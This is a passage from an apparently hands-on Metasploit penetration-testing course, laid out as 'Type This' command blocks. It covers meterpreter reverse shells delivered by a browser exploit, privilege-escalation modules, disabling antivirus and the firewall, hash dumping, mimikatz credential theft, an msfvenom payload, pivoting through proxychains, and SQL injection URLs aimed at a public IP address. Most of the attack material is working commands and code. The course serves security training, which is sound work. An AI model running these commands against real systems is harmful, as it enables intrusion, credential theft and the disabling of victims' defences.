1048for creating exploits, to a pattern offset script to find the offset at which we need to place our
1049custom shellcode.
1050
1051The final directory that we'll need to keep in mind is the plugins directory, which houses all the modules that have
1052to do with other programs to make things like importing and exporting reports simple.
1053Now that we have a clear understanding of what all of the different directories house, we can take a closer look at
1054the exploits directory and get a better understanding of how the directory structure is there, so if we make our own
1055modules we're going to have a better understanding of where everything needs to go.
1056---------------------------Type This-----------------------------------
1057cd ~/toolz/metasploit/modules/exploits
1058ls
1059-----------------------------------------------------------------------
1060
1061
1062- The exploits directory is split up into several different directories, each one housing exploits for different types
1063of systems. I.E. Windows, Unix, OSX, dialup and so on.
1064Likewise, if we were to go into the 'windows' directory, we're going to see that the exploits have been broken down
1065into categories of different types of services/programs, so that you can pick out an exploit specifically for the
1066service you're trying to exploit. Let's dig a little deeper into the auxiliary directory and see what all it holds
1067for us.
1068---------------------------Type This-----------------------------------
1069cd ~/toolz/metasploit/modules/auxiliary/
1070ls
1071-----------------------------------------------------------------------
1072
1073
1074- And a little further into the directory, let's take a look at what's in the scanner directory
1075---------------------------Type This-----------------------------------
1076cd ~/toolz/metasploit/modules/auxiliary/scanner/
1077ls
1078-----------------------------------------------------------------------
1079
1080
1081- And one more folder deeper into the structure, let's take a look in the portscan folder
1082---------------------------Type This-----------------------------------
1083cd ~/toolz/metasploit/modules/auxiliary/scanner/portscan
1084ls
1085-----------------------------------------------------------------------
1086
1087- If we run 'cat tcp.rb' we'll find that this module is simply a TCP scanner that will find tcp ports that are open
1088and report them back to us in a nice, easily readable format.
1089
1090cat tcp.rb
1091
1092
1093
1094- Just keep in mind that all of the modules in the auxiliary directory are there for information gathering and for use
1095once you have a session on a machine.
1096Taking a look at the payload directory, we can see all the available payloads, which are what run after an exploit
1097succeeds.
1098---------------------------Type This-----------------------------------
1099cd ~/toolz/metasploit/modules/payloads/
1100ls
1101-----------------------------------------------------------------------
1102
1103
1104- There are three different types of payloads: single, stagers, and staged. Each type of payload has a different
1105application for it to be used as.
1106Single payloads do everything you need them to do at one single time, so they call a shell back to you and let you
1107do everything once you have that shell calling back to you.
1108Stagers are required for limited payload space so that the victim machine will call back to your attack box to get
1109the rest of the instructions on what it's supposed to do. The first stage of the payload doesn't require all that
1110much space to just call back to the attacking machine to have the rest of the payload sent to it, mainly being used
1111to download Stage payloads.
1112
1113
1114- Stages are downloaded by stagers and typically do complex tasks, like VNC sessions, Meterpreter sessions, or bind
1115shells.
1116---------------------------Type This-----------------------------------
1117cd singles
1118cd windows
1119ls
1120-----------------------------------------------------------------------
1121
1122
1123- We can see several different payloads here that we can use on a windows system. Let's take a look at adduser.rb and
1124see what it actually does.
1125---------------------------Type This-----------------------------------
1126cat adduser.rb
1127-----------------------------------------------------------------------
1128
1129Looking at the code, we can see that it will add a new user called "Metasploit" to the machine and give
1130the new user "Metasploit" a password of "Metasploit$1". Further down in the file we can actually see the command that
1131it gives Windows to add the user to the system.
1132
1133
1134- Stagers just connect the victim machine back to yours to download the Stage payload, usually with a
1135
1136windows/shell/bind_tcp or windows/shell/reverse_tcp
1137---------------------------Type This-----------------------------------
1138cd ../../stagers
1139ls
1140-----------------------------------------------------------------------
1141
1142
1143
1144- Again, we can see that we have stagers for multiple systems and code types.
1145---------------------------Type This-----------------------------------
1146ls windows/
1147-----------------------------------------------------------------------
1148
1149
1150As you can see, the stagers are mainly just to connect to the victim, to setup a bridge between us and the victim
1151machine, so we can upload or download our stage payloads and execute commands.
1152Lastly, we can go to our stages directory to see what all payloads are available for us to send over for use with
1153our stagers...
1154---------------------------Type This-----------------------------------
1155cd ../stages
1156ls
1157-----------------------------------------------------------------------
1158
1159
1160Again, we can see that our stages are coded for particular operating systems and languages.
1161We can take a look at shell.rb and see the shellcode that would be put into the payload that would be staged on the
1162victim machine which would be encoded to tell the victim machine where to connect back to and what commands to run,
1163if any.
1164
1165- Other module directories include nops, encoders, and post. Post modules are what are used in sessions that have
1166already been opened in meterpreter, to gain more information on the victim machine, collect hashes, or even tokens,
1167so we can impersonate other users on the system in hopes of elevating our privileges.
1168---------------------------Type This-----------------------------------
1169cd ../../../post/
1170ls
1171cd windows/
1172ls
1173-----------------------------------------------------------------------
1174
1175
1176Inside the windows directory we can see all the post modules that can be run, capture is a directory that holds all
1177the modules to load keyloggers, or grab input from the victim machine. Escalate has modules that will try to
1178escalate our privileges. Gather has modules that will try to enumerate the host to get as much information as
1179possible out of it. WLAN directory holds modules that can pull down WiFi access points that the victim has in
1180memory/registry and give you the AP names as well as the WEP/WPA/WPA2 key for the network.
1181
1182
1183
1184###################################################
1185# Section 2: Actually Using Metasploit (For real) #
1186###################################################
1187---------------------------Type This-----------------------------------
1188sudo /sbin/iptables -F
1189
1190cd ~/toolz/metasploit
1191
1192./msfconsole
1193-----------------------------------------------------------------------
1194
1195##############################################
1196# Run any Linux command inside of MSFConsole #
1197##############################################
1198
1199---------------------------Type This-----------------------------------
1200ls
1201
1202pwd
1203
1204ping -c1 yahoo.com
1205
1206nmap 192.168.11.130
1207
1208nmap yahoo.com
1209-----------------------------------------------------------------------
1210
1211
1212
1213- You're on the outside scanning publicly accessible targets.
1214
1215
1216---------------------------Type This-----------------------------------
1217use auxiliary/scanner/portscan/tcp
1218
1219set RHOSTS 162.243.126.247
1220
1221set PORTS 80,443,445
1222
1223run
1224------------------------------------------------------------------------
1225
1226- In my opinion a much better option is a script called 'discover' from Lee Baird.
1227
1228- You can get it here: https://github.com/leebaird/discover
1229
1230- On the Ubuntu attack host you can run discover by typing the following:
1231---------------------------Type This-----------------------------------
1232cd ~/toolz/discover
1233sudo ./discover
1234-----------------------------------------------------------------------
1235
1236- From here you can just follow the prompts. It will run both Nmap NSE scripts and Metasploit aux modules with all of the correct parameters for you.
1237
1238
1239##################################
1240# Basic Client-Side Exploitation #
1241##################################
1242---------------------------Type This-----------------------------------
1243sudo /sbin/iptables -F
1244
1245cd ~/toolz/metasploit
1246
1247./msfconsole
1248
1249use exploit/windows/browser/ie_cgenericelement_uaf
1250
1251set ExitOnSession false
1252
1253set URIPATH /ie8
1254
1255set PAYLOAD windows/meterpreter/reverse_tcp
1256
1257set LHOST 192.168.11.129
1258
1259exploit -j
1260----------------------------------------------------------------------
1261
1262- Now from the Win7 host, use Internet Explorer 8 to connect to the exploit address (local address)
1263- given to you by metasploit.
1264
1265- The address will be something like:
1266
1267http://192.168.11.129:8080/ie8 (Make sure you change this to your ubuntu ip address)
1268
1269
1270
1271- This will simulate a victim clicking on your malicious link and being exploited with a browser exploit.
1272
1273
1274###########################
1275# Client-Side Enumeration #
1276###########################
1277
1278
1279- You can list the active sessions by typing:
1280---------------------------Type This-----------------------------------
1281sessions -l
1282
1283
1284
1285
1286- You can "interact" with any active session by typing sessions -i 3 (replace 3 with the session number you want to interact with)
1287
1288---------------------------Type This-----------------------------------
1289sessions -i 1
1290
1291
1292
1293
1294
1295- You should now see Metasploit's meterpreter prompt.
1296
1297
1298********************************** Figure out who and where you are **********************************
1299
1300---------------------------Type This-----------------------------------
1301meterpreter> sysinfo
1302
1303
1304meterpreter> getuid
1305
1306
1307meterpreter> ipconfig
1308
1309
1310meterpreter> run post/windows/gather/checkvm
1311
1312
1313
1314
1315********************************** Escalate privileges and get hashes **********************************
1316
1317
1318--Option 1: GetSystem
1319---------------------------Type This-----------------------------------
1320meterpreter> getsystem
1321
1322--Option 2:
1323---------------------------Type This-----------------------------------
1324meterpreter > run post/windows/escalate/getsystem
1325
1326--Option 3:
1327---------------------------Type This-----------------------------------
1328meterpreter> background
1329back
1330use post/windows/escalate/droplnk
1331set SESSION 1
1332set PAYLOAD windows/meterpreter/reverse_tcp
1333set LHOST 192.168.11.129 (Make sure you change this to your ubuntu ip address)
1334set LPORT 1234
1335exploit
1336
1337--Option 4:
1338---------------------------Type This-----------------------------------
1339use exploit/windows/local/bypassuac
1340set SESSION 1
1341set PAYLOAD windows/meterpreter/reverse_tcp
1342set LHOST 192.168.11.129 (Make sure you change this to your ubuntu ip address)
1343set LPORT 12345
1344exploit
1345
1346--Option 5:
1347---------------------------Type This-----------------------------------
1348use exploit/windows/local/service_permissions
1349set SESSION 1
1350set PAYLOAD windows/meterpreter/reverse_tcp
1351set LHOST 192.168.11.129 (Make sure you change this to your ubuntu ip address)
1352set LPORT 5555
1353exploit
1354
1355--Option 6:
1356---------------------------Type This-----------------------------------
1357use exploit/windows/local/trusted_service_path
1358set SESSION 1
1359set PAYLOAD windows/meterpreter/reverse_tcp
1360set LHOST 192.168.11.129 (Make sure you change this to your ubuntu ip address)
1361set LPORT 4567
1362exploit
1363
1364
1365--Option 7:
1366---------------------------Type This-----------------------------------
1367use exploit/windows/local/ppr_flatten_rec
1368set SESSION 1
1369set PAYLOAD windows/meterpreter/reverse_tcp
1370set LHOST 192.168.11.129 (Make sure you change this to your ubuntu ip address)
1371set LPORT 7777
1372exploit
1373
1374--Option 8:
1375---------------------------Type This-----------------------------------
1376use exploit/windows/local/ms_ndproxy
1377set SESSION 1
1378set PAYLOAD windows/meterpreter/reverse_tcp
1379set LHOST 192.168.11.129 (Make sure you change this to your ubuntu ip address)
1380set LPORT 7788
1381exploit
1382
1383
1384--Option 9:
1385---------------------------Type This-----------------------------------
1386use exploit/windows/local/ask
1387set SESSION 1
1388set PAYLOAD windows/meterpreter/reverse_tcp
1389set LHOST 192.168.11.129 (Make sure you change this to your ubuntu ip address)
1390set LPORT 7799
1391exploit
1392
1393
1394meterpreter > getuid
1395Server username: win7-64-victim\Workshop
1396meterpreter > getsystem
1397...got system (via technique 1).
1398meterpreter > getuid
1399Server username: NT AUTHORITY\SYSTEM
1400
1401--------------------------------------------------------
1402
1403meterpreter> run killav
1404
1405meterpreter> run post/windows/gather/hashdump
1406
1407meterpreter > ps (search for a process running as NT AUTHORITY\SYSTEM)
1408
1409meterpreter > migrate 2800 (your process id WILL NOT be 2800, but make sure you use one that is running at NT AUTHORITY\SYSTEM)
1410
1411meterpreter> run post/windows/gather/credentials/credential_collector
1412-----------------------------------------------------------------------
1413
1414#####################
1415# Fix broken PSExec #
1416#####################
1417- We spawn an interactive, hidden cmd.exe on the victim (the execute command below) to get to its command prompt so we can add a registry value.
1418---------------------------Type This-----------------------------------
1419meterpreter > execute -c -H -f cmd -a "/k" -i
1420
1421
1422
1423- Create a registry value on the victim computer; setting LocalAccountTokenFilterPolicy to 1 disables UAC remote restrictions for local accounts, which is what allows the machine to be accessed with the PsExec exploit. This weakens the host's configuration, so revert it once the lab is done.
1424---------------------------Type This-----------------------------------
1425C:\Windows\system32> reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1
1426
1427---------------------------Type This-----------------------------------
1428c:\Windows\system32> netsh advfirewall set allprofiles state off
1429
1430********************************** Steal Tokens **********************************
1431---------------------------Type This-----------------------------------
1432meterpreter > getsystem
1433
1434meterpreter > use incognito
1435
1436meterpreter > list_tokens -u
1437
1438meterpreter > list_tokens -g
1439---------------------------Type This-----------------------------------
1440
1441NOTE: These commands will not work as your VM is not connected to Active Directory. They are provided so you can have the syntax.
1442
1443---------------------------Type This-----------------------------------
1444meterpreter > impersonate_token <-- choose who you want to impersonate but be sure to use 2 slashes in the name (ex: impersonate_token domain\\user)
1445
1446meterpreter> getuid
1447
1448
1449************ Stealing credentials and certificates ************
1450- NOTE: Most of the stuff after 'kerberos' DOES NOT work, but is given here so you know the correct syntax to use when connected to AD or dealing with smart/CAC cards.
1451---------------------------Type This-----------------------------------
1452meterpreter > getsystem
1453
1454meterpreter > load mimikatz
1455
1456meterpreter > kerberos
1457
1458
1459NOTE: These commands will not work as your VM is not connected to Active Directory. They are provided so you can have the syntax.
1460
1461
1462meterpreter > mimikatz_command -f sekurlsa::logonPasswords -a "full"
1463
1464meterpreter > msv <-- Your AD password
1465
1466meterpreter > livessp <-- Your Windows8 password
1467
1468meterpreter > ssp <-- Your outlook password
1469
1470meterpreter > tspkg <-- Your AD password
1471
1472meterpreter > wdigest <-- Your AD password
1473
1474meterpreter > mimikatz_command -f crypto::listStores
1475
1476meterpreter > mimikatz_command -f crypto::listCertificates
1477
1478meterpreter > mimikatz_command -f crypto::exportCertificates CERT_SYSTEM_STORE_CURRENT_USER
1479
1480meterpreter > mimikatz_command -f crypto::patchcapi
1481
1482meterpreter> search -d <directory> -f <file-pattern>
1483
1484
1485********************************** Enumerate the host you are on **********************************
1486---------------------------Type This-----------------------------------
1487meterpreter > run post/windows/gather/enum_applications
1488
1489meterpreter > run post/windows/gather/enum_logged_on_users
1490
1491meterpreter > run post/windows/gather/usb_history
1492
1493meterpreter > run post/windows/gather/enum_shares
1494
1495meterpreter > run post/windows/gather/enum_snmp
1496
1497meterpreter> reg enumkey -k HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
1498
1499
1500
1501********************************** Lateral Movement *******************************
1502
1503
1504Now we can run the PSEXEC exploit.
1505-- Option 1:
1506---------------------------Type This-----------------------------------
1507use exploit/windows/smb/psexec
1508
1509set SMBUser Workshop
1510
1511set SMBPass password
1512
1513set RHOST 192.168.11.130
1514
1515set payload windows/meterpreter/reverse_tcp
1516
1517set LHOST 192.168.11.129
1518
1519set LPORT 2345
1520
1521exploit
1522
1523
1524
1525
1526-- Option 2:
1527---------------------------Type This-----------------------------------
1528use exploit/windows/smb/psexec
1529
1530set SMBUser Workshop
1531
1532set SMBPass aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c
1533
1534set payload windows/meterpreter/reverse_tcp
1535
1536set RHOST 192.168.11.130
1537
1538set LHOST 192.168.11.129
1539
1540set LPORT 5678
1541
1542exploit
1543
1544
1545##################
1546# Day 2 Homework #
1547##################
1548
1549---------------------------------------------------------------------------------
1550
1551Day 2 Homework:
1552Send Ivana an email ivana{a-t}strategicsec{d-o-t}.com with a word document that contains screenshots of everything that we have covered so far. Make the subject of the email "First Name - Last Name - Metasploit Day 2" (ex: Joseph - McCray - Metasploit Day 2).
1553
1554Please take screenshots of you doing the first 10 videos in this playlist and add them to this document.
1555https://www.youtube.com/playlist?list=PL1512BD72E7C9FFCA
1556
1557Also be sure to name the attached file "FirstName.LastName.MetasploitDay2.docx" (Joseph.McCray.MetasploitDay2.docx).
1558
1559NOTE: This is what is required in order to receive your certificate of completion and CPEs.
1560---------------------------------------------------------------------------------
1561
1562
1563
1564#################################################
1565# Section 3: Writing Meterpreter Resource Files #
1566#################################################
1567
1568
1569- In this lab we are going to create a binary payload via msfvenom (the successor to msfpayload), then craft a .rc file that automates the
1570process of setting up the multi/handler listener.
1571
1572- We will start off by creating the payload with msfvenom
1573---------------------------Type This-----------------------------------
1574sudo /sbin/iptables -F
1575 strategicsec
1576
1577cd ~/toolz/metasploit
1578
1579./msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=192.168.11.129 -f exe > /home/infosecaddicts/Desktop/meterpreter.exe
1580
1581sudo chmod 777 /home/infosecaddicts/Desktop/meterpreter.exe
1582
1583- In the syntax above, we set the payload, set the local host address to connect back to, then redirected the
1584malicious payload to our desktop by giving the correct path. We also change the permissions on it to 777 just
1585to make it easy for us to use WinSCP to copy it over to our Win7 machine.
1586
1587- Next we are going to create a .rc (resource file) file that will automate the process for setting up a listener.
1588
1589- Navigate to the /home/infosecaddicts/toolz/metasploit/ so that when you create the .rc file you can save it in the
1590working directory.
1591
1592
1593- Type 'touch meterpreter.rc' to create the file.
1594---------------------------Type This-----------------------------------
1595touch meterpreter.rc
1596
1597- Type 'echo use exploit/multi/handler >> meterpreter.rc' to be appended to the .rc file.
1598echo use exploit/multi/handler >> meterpreter.rc
1599
1600- Type 'echo set PAYLOAD windows/meterpreter/reverse_tcp >> meterpreter.rc' to be appended to the .rc file.
1601echo set PAYLOAD windows/meterpreter/reverse_tcp >> meterpreter.rc
1602
1603- Type 'echo set LHOST 192.168.11.129>> meterpreter.rc' to be appended to the .rc file.
1604echo set LHOST 192.168.11.129>> meterpreter.rc
1605
1606- Type 'echo exploit -j -z >> meterpreter.rc' to be appended to the .rc file.
1607echo exploit -j -z >> meterpreter.rc
1608
1609- Then cat the meterpreter.rc out to verify that everything in the file looks ok.
1610cat meterpreter.rc
1611
1612Now at the command prompt, type 'sudo ./msfconsole -r meterpreter.rc' to start the msfconsole module and call/run
1613
1614the 'meterpreter.rc' file.
1615./msfconsole -r meterpreter.rc
1616
1617- Once the msfconsole starts, the meterpreter resource file is executed and the listener is automatically setup. It is now listening for a connection!
1618
1619- Now you must transfer the malicious meterpreter payload to the victim machine (you may do so by any means necessary; we have physical access, so we transferred it via USB).
1620
1621- Click on the payload and create the meterpreter session.
1622
1623- Type 'sessions -l' to list your open sessions, and 'sessions -i 1' to indicate that you want to interact with
1624
1625meterpreter session under id 1.
1626
1627exit -y
1628
1629
1630
1631
1632***********************************
1633* Getting Serious About .rc files *
1634***********************************
1635
1636---------------------------Type This-----------------------------------
1637touch /home/infosecaddicts/toolz/metasploit/autorun-walk-through.rc
1638
1639echo run getcountermeasure >> /home/infosecaddicts/toolz/metasploit/autorun-walk-through.rc
1640
1641echo run winenum >> /home/infosecaddicts/toolz/metasploit/autorun-walk-through.rc
1642
1643echo run post/windows/gather/enum_applications >> /home/infosecaddicts/toolz/metasploit/autorun-walk-through.rc
1644
1645echo run post/windows/gather/enum_logged_on_users >> /home/infosecaddicts/toolz/metasploit/autorun-walk-through.rc
1646
1647echo run post/windows/gather/checkvm >> /home/infosecaddicts/toolz/metasploit/autorun-walk-through.rc
1648
1649
1650
1651- Ok, that was fun. Now let's take a quick look at the .rc file we just created.
1652---------------------------Type This-----------------------------------
1653cat /home/infosecaddicts/toolz/metasploit/autorun-walk-through.rc
1654
1655
1656
1657
1658touch /home/infosecaddicts/toolz/metasploit/old-faithful-ie8.rc
1659
1660
1661echo use exploit/windows/browser/ie_cgenericelement_uaf >> /home/infosecaddicts/toolz/metasploit/old-faithful-ie8.rc
1662
1663echo set ExitOnSession true >> /home/infosecaddicts/toolz/metasploit/old-faithful-ie8.rc
1664
1665echo set URIPATH /ie8 >> /home/infosecaddicts/toolz/metasploit/old-faithful-ie8.rc
1666
1667echo set PAYLOAD windows/meterpreter/reverse_tcp >> /home/infosecaddicts/toolz/metasploit/old-faithful-ie8.rc
1668
1669echo set LHOST 192.168.11.129 >> /home/infosecaddicts/toolz/metasploit/old-faithful-ie8.rc
1670
1671
1672
1673echo set AutoRunScript multi_console_command -rc /home/infosecaddicts/toolz/metasploit/autorun-walk-through.rc >> /home/infosecaddicts/toolz/metasploit/old-faithful-ie8.rc
1674
1675echo exploit -j -z >> /home/infosecaddicts/toolz/metasploit/old-faithful-ie8.rc
1676
1677
1678
1679- Ok, that was more fun than the previous one. Now let's take a quick look at the .rc file we just created.
1680---------------------------Type This-----------------------------------
1681cat /home/infosecaddicts/toolz/metasploit/autorun-walk-through.rc
1682
1683cat /home/infosecaddicts/toolz/metasploit/old-faithful-ie8.rc
1684
1685- Alright, enough already. Let's run this thing.
1686./msfconsole -r old-faithful-ie8.rc
1687
1688
1689
1690###########################################
1691# Section 4: Custom Meterpreter Scripting #
1692###########################################
1693---------------------------Type This-----------------------------------
1694cd ~
1695mkdir binaries
1696cd ~/binaries
1697wget https://s3.amazonaws.com/infosecaddictsfiles/wce.exe
1698wget https://s3.amazonaws.com/infosecaddictsfiles/nc.exe
1699wget https://s3.amazonaws.com/infosecaddictsfiles/mimikatz.exe
1700-----------------------------------------------------------------------
1701- In this lab we will be looking at how you can use some custom Meterpreter scripts to do more than what Metasploit
1702
1703can offer. This will also show you the flexibility of the Meterpreter scripts.
1704
1705- We're going to start off with a simple Hello World script first.
1706
1707---------------------------Type This-----------------------------------
1708echo 'print_status("Hello World")' > /home/infosecaddicts/toolz/metasploit/scripts/meterpreter/helloworld.rb
1709-----------------------------------------------------------------------
1710
1711- This next portion is up to you, exploit your test box and end up with a Meterpreter shell.
1712
1713- Lets test out our helloworld.rb Meterpreter script.
1714
1715---------------------------Type This-----------------------------------
1716meterpreter> run helloworld
1717
1718
1719- So far so good, now we can build on this base. Lets add a couple more API calls to the script.
1720
1721- Open /home/infosecaddicts/toolz/metasploit/scripts/meterpreter/helloworld.rb in your favorite editor and add the following
1722
1723lines.
1724---------------------------Type This-----------------------------------
1725vi /home/infosecaddicts/toolz/metasploit/scripts/meterpreter/helloworld.rb
1726
1727
1728---------------------------Type This-----------------------------------
1729print_error("this is an error!")
1730print_line("this is a line")
1731
1732- Now run the script:
1733
1734meterpreter> run helloworld
1735
1736
1737- Now that we have the basics down, we're going to do something a little more exciting.
1738- The architecture to follow when creating these scripts goes as follows:
1739
1740def getinfo(session)
1741 begin
1742 <stuff goes here>
1743 rescue ::Exception => e
1744 <stuff goes here>
1745 end
1746end
1747
1748-----------------------------------------------------------------------
1749- Copy and paste the following code into our helloworld.rb script:
1750---------------------------Type This-----------------------------------
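# Print basic facts about the compromised host through the given Meterpreter session.
#
# session - a Meterpreter session object exposing sys.config.sysinfo (a Hash) and
#           sys.config.getuid
#
# Any exception raised by the session API is caught and reported with print_error
# instead of aborting the script.
def getinfo(session)
  begin
    sysnfo  = session.sys.config.sysinfo
    runpriv = session.sys.config.getuid
    print_status("Getting system information ...")
    print_status("The target machine OS is #{sysnfo['OS']}")
    # Fix: the original interpolated the literal string 'Computer' instead of the
    # sysinfo value, so the host name was never printed.
    print_status("The computer name is #{sysnfo['Computer']} ")
    print_status("Script running as #{runpriv}")
  rescue ::Exception => e
    print_error("The following error was encountered #{e}")
  end
end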
1763
# Run the report against the current Meterpreter session (`client` is provided by the framework).
getinfo client
1765--------------------------------------------------------------------------
1766
1767
1768- Now run the script:
1769---------------------------Type This-----------------------------------
1770meterpreter> run helloworld
1771
1772
1773- We can expand it by adding actual system commands to the script, let's look at how we can do this.
1774
1775---------------------------Type This-----------------------------------
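# Run each command in cmdlst on the target via "cmd.exe /c" through the given
# Meterpreter session and print whatever the command writes to its channel.
#
# session - a Meterpreter session exposing response_timeout= and sys.process.execute
# cmdlst  - an Enumerable of command strings (an empty list only prints the header)
#
# Errors from one command are reported with print_error and do not stop the
# remaining commands. The process and channel handles are always closed, even
# when reading the channel fails (the original skipped the close calls on error).
def list_exec(session, cmdlst)
  print_status("Running Command List ...")
  # Allow up to 120 seconds per response, as in the original script.
  session.response_timeout = 120
  cmdlst.each do |cmd|
    process = nil
    begin
      print_status "running command #{cmd}"
      process = session.sys.process.execute("cmd.exe /c #{cmd}", nil, {'Hidden' => true, 'Channelized' => true})
      # channel.read returns nil once the command has no more output
      while (d = process.channel.read)
        print_status("#{d}")
      end
    rescue ::Exception => e
      print_error("Error Running Command #{cmd}: #{e.class} #{e}")
    ensure
      # Close whatever was opened; a failure here is reported but does not
      # propagate, so the next command still runs.
      begin
        if process
          process.channel.close
          process.close
        end
      rescue ::Exception => e
        print_error("Error Running Command #{cmd}: #{e.class} #{e}")
      end
    end
  end
end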
1795
# Commands to run on the target; each one is executed as "cmd.exe /c <command>".
commands = [
  "set",
  "ipconfig /all",
  "arp -a",
]

# `client` is the current Meterpreter session supplied by the framework.
list_exec(client, commands)
1801------------------------------------------------------------------------
1802
1803
1804- Run the script:
1805---------------------------Type This-----------------------------------
1806meterpreter> run helloworld
1807
1808
1809Note: Add all of the commands from the script below to your helloworld.rb script:
1810https://raw.githubusercontent.com/rapid7/metasploit-framework/master/scripts/meterpreter/winenum.rb
1811
1812
1813
1814---------------------------------------------------------------------------------
1815
1816
1817###########################################
1818# Section 3: Tunneling For Fun and Profit #
1819###########################################
1820
1821*****************************Enumerate the network you are on ***************************
1822
1823meterpreter > run netenum
1824
1825meterpreter > run netenum -ps -r 192.168.200.0/24
1826
1827meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.200.0/24
1828
1829
1830
1831********************************** Set up your Pivot **********************************
1832
1833meterpreter > background
1834 <-- background the session
1835 You want to get back to this prompt:
1836 msf exploit(handler) > back <--- you need to get to main msf> prompt
1837
1838
1839
1840 sessions -l <--find a session you want to pivot through (note the IP and session number)
1841
1842 Now set up Pivot with a route add
1843 ---------------------------------
1844
1845route print
1846
1847route add CHANGEME-TO-YOUR-WIN7-IP 255.255.255.0 1 <-- Use the correct session id (2), it may be 3, or 4 (make sure you are on the msf> prompt, not meterpreter)
1848
1849
1850route print <----- verify new route
1851
1852******************************Scan through your Pivot ******************************
1853
1854use auxiliary/scanner/portscan/tcp <-- Run aux modules through your pivot
1855
1856set THREADS 10
1857
1858set RHOSTS 192.168.200.0/24 <-- Keep changing this IP and re-running the scan until you find something you want to attack
1859
1860set PORTS 445
1861
1862run
1863
1864
1865####################################
1866# Socks Tunneling with Proxychains #
1867####################################
1868--- Open a duplicate putty session to your Ubuntu host
1869
1870sudo apt-get install -y proxychains
1871 strategicsec
1872
1873sudo vi /etc/proxychains.conf <--- Make sure that the last line of the file is: socks4 127.0.0.1 1080
1874
1875 Comment out the proxy_dns, change the 9050 (tor port) to the metasploit socks proxy port (1080) and save it.
1876 socks4 127.0.0.1 1080
1877
1878***************************Set up a Socks Proxy through your Pivot *************************
1879
1880
1881use auxiliary/server/socks4a
1882
1883set SRVHOST 127.0.0.1
1884
1885set SRVPORT 1080
1886
1887run
1888
1889 --- Go back to your other putty session with the meterpreter shell
1890cd ~
1891
1892proxychains nmap -sT -PN -vv -sV --script=smb-os-discovery.nse -p 445 192.168.200.0/24 <--- This is going to be really slow
1893
1894proxychains nmap -sT -PN -n -sV -p 21,22,23,25,80,110,139,443,1433,1521,3306,3389,8080,10000 192.168.200.0/24 <--- This is going to be really slow
1895
1896
1897 ---close the duplicate putty session to your Ubuntu host
1898
1899##################################
1900# Basic: Web Application Testing #
1901##################################
1902
1903Most people are going to tell you to reference the OWASP Testing Guide.
1904https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents
1905
1906I'm not a fan of it for the purpose of actual testing. It's good for defining the scope of an assessment, and defining attacks, but not very good for actually attacking a website.
1907
1908
1909The key to doing a Web App Assessment is to ask yourself the 3 web questions on every page in the site.
1910
1911 1. Does the website talk to a DB?
1912 - Look for parameter passing (ex: site.com/page.php?id=4)
1913 - If yes - try SQL Injection
1914
1915 2. Can I or someone else see what I type?
1916 - If yes - try XSS
1917
1918 3. Does the page reference a file?
1919 - If yes - try LFI/RFI
1920
1921Let's start with some manual testing against 54.245.184.121
1922
1923
1924Start here:
1925http://54.245.184.121/
1926
1927
1928There's no parameter passing on the home page so the answer to question 1 is NO.
1929There is however a search box in the top right of the webpage, so the answer to question 2 is YES.
1930
1931Try an XSS in the search box on the home page:
1932<script>alert(123);</script>
1933
1934Doing this gives us the following in the address bar:
1935http://54.245.184.121/BasicSearch.aspx?Word=<script>alert(123);</script>
1936
1937Ok, so we've verified that there is XSS in the search box.
1938
1939Let's move on to the search box in the left of the page.
1940
1941Let's give the newsletter signup box a shot
1942
1943Moving on to the login page.
1944http://54.245.184.121/login.aspx
1945
1946I entered a single quote (') for both the user name and the password. I got the following error:
1947
1948Let's try throwing a single quote (') in there:
1949
1950http://54.245.184.121/bookdetail.aspx?id=2'
1951
1952
1953I get the following error:
1954
1955Unclosed quotation mark after the character string ''.
1956Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
1957
1958Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark after the character string ''.
1959
1960
1961
1962
1963
1964
1965
1966
1967
1968
1969#########################################################################################
1970# SQL Injection #
1971# https://s3.amazonaws.com/infosecaddictsfiles/1-Intro_To_SQL_Intection.pptx #
1972#########################################################################################
1973
1974
1975- Another quick way to test for SQLI is to remove the parameter value
1976
1977
1978#############################
1979# Error-Based SQL Injection #
1980#############################
1981http://54.245.184.121/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--
1982http://54.245.184.121/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--
1983http://54.245.184.121/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--
1984http://54.245.184.121/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--
1985http://54.245.184.121/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--
1986http://54.245.184.121/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))-- NOTE: "N" - just means to keep going until you run out of databases
1987http://54.245.184.121/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--
1988http://54.245.184.121/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')--
1989http://54.245.184.121/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--
1990
1991
1992
1993
1994#############################
1995# Union-Based SQL Injection #
1996#############################
1997http://54.245.184.121/bookdetail.aspx?id=2 order by 100--
1998http://54.245.184.121/bookdetail.aspx?id=2 order by 50--
1999http://54.245.184.121/bookdetail.aspx?id=2 order by 25--
2000http://54.245.184.121/bookdetail.aspx?id=2 order by 10--
2001http://54.245.184.121/bookdetail.aspx?id=2 order by 5--
2002http://54.245.184.121/bookdetail.aspx?id=2 order by 6--
2003http://54.245.184.121/bookdetail.aspx?id=2 order by 7--
2004http://54.245.184.121/bookdetail.aspx?id=2 order by 8--
2005http://54.245.184.121/bookdetail.aspx?id=2 order by 9--
2006http://54.245.184.121/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--
2007
2008 We are using a union select statement because we are joining the developer's query with one of our own.
2009 Reference:
2010 http://www.techonthenet.com/sql/union.php
2011 The SQL UNION operator is used to combine the result sets of 2 or more SELECT statements.
2012 It removes duplicate rows between the various SELECT statements (UNION ALL, used above, keeps them).
2013
